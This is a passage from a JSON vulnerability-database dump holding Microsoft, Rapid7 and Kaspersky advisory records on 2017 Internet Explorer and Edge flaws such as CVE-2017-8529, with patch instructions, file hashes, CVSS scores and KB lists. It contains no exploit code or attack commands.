Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n**Note** With the rerelease of CVE-2017-8529, Microsoft has addressed previously known print issues related to this vulnerability; however, to prevent the potential for any further print regressions, the solution for CVE-2017-8529 is turned off by default. To be fully protected from this vulnerability, you need to apply a registry change after installing the update. For more information, go to [CVE-2017-8529](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8529>).\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base: Security update deployment information: September 12, 2017\n\n## How to get and install the update \n\n### Method 1: Microsoft Update\n\nThis update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<http://support.microsoft.com/en-us/help/12373/windows-update-faq>). 
\n \nNote For Windows RT and Windows RT 8.1, this update is available through Microsoft Update only.\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4036586>) website.\n\n## More Information\n\n## \n\n__\n\nHow to get help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n\nFile informationFor a list of the files that are provided in this cumulative update, download the [file information for cumulative update 4036586](<http://download.microsoft.com/download/4/9/D/49D5D19C-61F5-485E-A778-B4A77BB9905E/4036586.csv>).\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows8.1-KB4036586-x86.msu| 2CCE23B908D860C489D1E12127291FDCEBE4B8FC| 715083B8FCA497173FB6D77B458566A5FF94547548531E5687A7ACC3401DA8E3 \nWindows8.1-KB4036586-arm.msu| 23E0797B4F2F2B5046482607E4A0E7FB64FB512A| 33ABF4AEF8A8CE7B17ADC095BA7F37048C5741A967D378EA4F1ED097C0181721 \nWindows8.1-KB4036586-x64.msu| B6B49D1BC62F547698325BA6945A1B7B6E630725| 54A3A99677CE1D9C1BD5557F33481F4F9C0966F164F17C93F239C7248431A238 \nIE11-Windows6.1-KB4036586-X86.msu| A1EB4F1BCBF003890D20287D15C8864A5B574930| 45FFAE70123C5DCA3DC3AC3C583A0F1E62FEBC422F378B563C66DA63C4366657 \nIE11-Windows6.1-KB4036586-X64.msu| 0214C0DE68AAB4A4DC1D350AF5BC289561528193| 22BF654C7B9674F268C18D1B84F31D973E24167ABB651DB848E6CE5D4F94CF08 \nIE9-Windows6.0-KB4036586-X86.msu| 
668DB855D0EAB1C135F2C4A544C4081644309514| F1D02B01C7721C029096459F3A4C87E6AD54CF4999A779F0F8056E8CFA36ADF6 \nIE9-Windows6.0-KB4036586-X64.msu| C7EAD6911FDF5DBF9AF675E2A665FB8668453A8F| 5FD7553406BD257C3143F4E181748D49B7EEB0358BA12AA732BE701D05551872 \nWindows8-RT-KB4036586-x64.msu| FBFCEA3DCA759E317FB36123722539687E790429| A3DBFC64746103E5A080A31DBE32507AF43926DCF865B0E9195CC5F2199F5D2B\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T07:00:00", "type": "mskb", "title": "Cumulative security update for Internet Explorer: September 12, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8741"], "modified": "2017-09-12T07:00:00", "id": "KB4036586", "href": "https://support.microsoft.com/en-us/help/4036586", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "rapid7community": [{"lastseen": "2017-07-15T11:19:48", "description": "<!-- [DocumentBodyStart:e77f9230-8f74-475c-b473-b6f851c59bb3] --><div class=\"jive-rendered-content\"><p>Most of the critical vulnerabilities patched <a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Freleasenotedetail%2Ff2b16606-4945-e711-80dc-000d3a32fc99\" rel=\"nofollow\" target=\"_blank\">this month</a> concern client-side systems, with 14 separate Remote Code Execution (RCE) issues being addressed for the Microsoft Edge browser and five for Internet Explorer. One of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelpx.adobe.com%2Fsecurity%2Fproducts%2Fflash-player%2Fapsb17-21.html\" rel=\"nofollow\" target=\"_blank\">three Adobe Flash Player vulnerabilities</a> being patched is also a critical RCE bug (CVE-2017-3099). Of the 54 Microsoft CVEs addressed, 33 relate to Edge and 14 to Internet Explorer.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Browser-based RCE vulnerabilities are a significant attack vector, but they typically require some degree of social engineering in order to convince the user to visit a malicious web page. Similarly with most Microsoft Office bugs (eight CVEs this month), users need to be tricked into opening attachments. More concerning are RCE vulnerabilities that do not require any user interaction. Exploits can be weaponized to quickly spread malware, as we've seen with the recent ransomware outbreaks.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>This month, Microsoft has fixed <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8589\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8589</a>, a critical RCE vulnerability that could allow an attacker to take full control of a system by sending specially crafted messages to the Windows Search service. This typically requires access to the target computer. 
However, in an enterprise setting, it is possible for a remote, unauthenticated actor to trigger the vulnerability via an SMB connection. Fixes for CVE-2017-8589 have been released for all supported versions of Windows, so server administrators aren't off the hook for patching. There is also <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8501\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8501</a>, which affects SharePoint Enterprise Server 2013.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>One final point of interest: last month, Microsoft released a fix for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8529\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8529</a> (a browser information disclosure vulnerability whereby an attacker can detect specific files on the user's computer) that <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsupport.microsoft.com%2Fen-ca%2Fhelp%2F4032782%2Fa-blank-page-or-404-error-prints-when-you-try-to-print-a-frame-in-ie\" rel=\"nofollow\" target=\"_blank\">broke the printing functionality</a> in Internet Explorer and Edge for some users. Over the next two weeks they released various updates to resolve the printing issue, which ultimately <em>removed</em> the protection against CVE-2017-8529. Microsoft has still not been able to resolve the security issue without reintroducing the printing bug, and customers who take automatic updates will still be vulnerable. As of this writing, the only way to be protected is to have applied the June updates and no others (which is not recommended). The severity of CVE-2017-8529 is considered low (on server systems) to moderate (otherwise). 
If it is of concern, for example on particularly sensitive systems, a workaround would be to use a different web browser until this vulnerability is correctly patched.</p></div><!-- [DocumentBodyEnd:e77f9230-8f74-475c-b473-b6f851c59bb3] -->", "cvss3": {}, "published": "2017-07-12T13:39:36", "title": "Patch Tuesday - July 2017", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8501", "CVE-2017-3099", "CVE-2017-8589", "CVE-2017-8529"], "modified": "2017-07-12T13:39:36", "href": "https://community.rapid7.com/community/nexpose/blog/2017/07/12/patch-tuesday-july-2017", "id": "RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2021-08-18T11:17:27", "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer and Microsoft Edge. 
Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Edge \nMicrosoft Internet Explorer versions 9 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8520>) \n[CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>) \n[CVE-2017-8499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8499>) \n[CVE-2017-8496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8496>) \n[CVE-2017-8497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8497>) \n[CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>) \n[CVE-2017-8530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8530>) \n[CVE-2017-8524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8524>) \n[CVE-2017-8522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8522>) \n[CVE-2017-8549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8549>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8517>) \n[CVE-2017-8521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8521>) \n[CVE-2017-8504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8504>) \n[CVE-2017-8548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8548>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8519>) 
\n[CVE-2017-8547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8547>) \n[CVE-2017-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8555>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529>) \n[CVE-2017-8496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8496>) \n[CVE-2017-8497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8497>) \n[CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>) \n[CVE-2017-8499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8499>) \n[CVE-2017-8504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8504>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8517>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8519>) \n[CVE-2017-8520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8520>) \n[CVE-2017-8521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8521>) \n[CVE-2017-8522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8522>) \n[CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>) \n[CVE-2017-8524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8524>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529>) \n[CVE-2017-8547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8547>) \n[CVE-2017-8548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8548>) \n[CVE-2017-8549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8549>) 
\n[CVE-2017-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8555>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8496>) 7.6 Critical \n[CVE-2017-8497](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8497>) 7.6 Critical \n[CVE-2017-8498](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8498>) 4.3 Warning \n[CVE-2017-8499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8499>) 7.6 Critical \n[CVE-2017-8504](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8504>) 4.3 Warning \n[CVE-2017-8517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8517>) 7.6 Critical \n[CVE-2017-8519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8519>) 7.6 Critical \n[CVE-2017-8520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8520>) 7.6 Critical \n[CVE-2017-8521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8521>) 7.6 Critical \n[CVE-2017-8522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8522>) 7.6 Critical \n[CVE-2017-8523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8523>) 4.3 Warning \n[CVE-2017-8524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8524>) 7.6 Critical \n[CVE-2017-8529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529>) 4.3 Warning \n[CVE-2017-8530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8530>) 5.8 High \n[CVE-2017-8547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8547>) 7.6 Critical \n[CVE-2017-8548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8548>) 7.6 Critical \n[CVE-2017-8549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8549>) 7.6 Critical \n[CVE-2017-8555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8555>) 4.3 Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB 
list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038792](<http://support.microsoft.com/kb/4038792>) \n[4038799](<http://support.microsoft.com/kb/4038799>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4038777](<http://support.microsoft.com/kb/4038777>) \n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4036586](<http://support.microsoft.com/kb/4036586>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "kaspersky", "title": "KLA11045 Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8498", "CVE-2017-8499", "CVE-2017-8504", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8529", "CVE-2017-8530", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8555"], "modified": "2020-06-18T00:00:00", "id": "KLA11045", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11045/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T18:09:55", "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, or gain privileges.\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Affected products*:\nMicrosoft Silverlight 5 when installed on Microsoft Windows (x64-based) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Lync 2010 (32-bit) \nMicrosoft Lync 2013 Service Pack 1 (32-bit) \nSkype for Business 2016 (64-bit) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nInternet Explorer 11 \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft Lync 2013 Service Pack 1 (64-bit) \nWindows Server 2008 for x64-based Systems Service Pack 2 
\nMicrosoft Office 2016 Click-to-Run (C2R) for 32-bit editions \nWindows Server 2016 \nMicrosoft Lync 2010 Attendee (admin level install) \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nSkype for Business 2016 (32-bit) \nMicrosoft Lync 2010 Attendee (user level install) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Lync 2010 (64-bit) \nMicrosoft Office Word Viewer \nMicrosoft Live Meeting 2007 Console \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (32-bit) \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (x64-based) \nMicrosoft Office 2007 Service Pack 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Office 2016 Click-to-Run (C2R) for 64-bit editions \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nMicrosoft Silverlight 5 when installed on Microsoft Windows (32-bit) \nWindows Server 2012 R2 \nMicrosoft Live Meeting 2007 Add-in\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) 
\n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-8544](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8544>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) \n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8529>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-0286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0286>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) 
\n[CVE-2017-8517](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8517>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-0298](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0298>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8553](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8553>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) 
\n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-8534](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8534>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) \n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8519>) \n[CVE-2017-0260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0260>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022722](<http://support.microsoft.com/kb/4022722>) \n[4024402](<http://support.microsoft.com/kb/4024402>) \n[4022008](<http://support.microsoft.com/kb/4022008>) \n[4021903](<http://support.microsoft.com/kb/4021903>) \n[4021923](<http://support.microsoft.com/kb/4021923>) \n[4022013](<http://support.microsoft.com/kb/4022013>) 
\n[4022010](<http://support.microsoft.com/kb/4022010>) \n[4018106](<http://support.microsoft.com/kb/4018106>) \n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4022884](<http://support.microsoft.com/kb/4022884>) \n[4022883](<http://support.microsoft.com/kb/4022883>) \n[3217845](<http://support.microsoft.com/kb/3217845>) \n[4034679](<http://support.microsoft.com/kb/4034679>) \n[4034664](<http://support.microsoft.com/kb/4034664>) \n[4034741](<http://support.microsoft.com/kb/4034741>) \n[4036586](<http://support.microsoft.com/kb/4036586>) \n[4503292](<http://support.microsoft.com/kb/4503292>) \n[4503269](<http://support.microsoft.com/kb/4503269>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "kaspersky", "title": "KLA11842 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 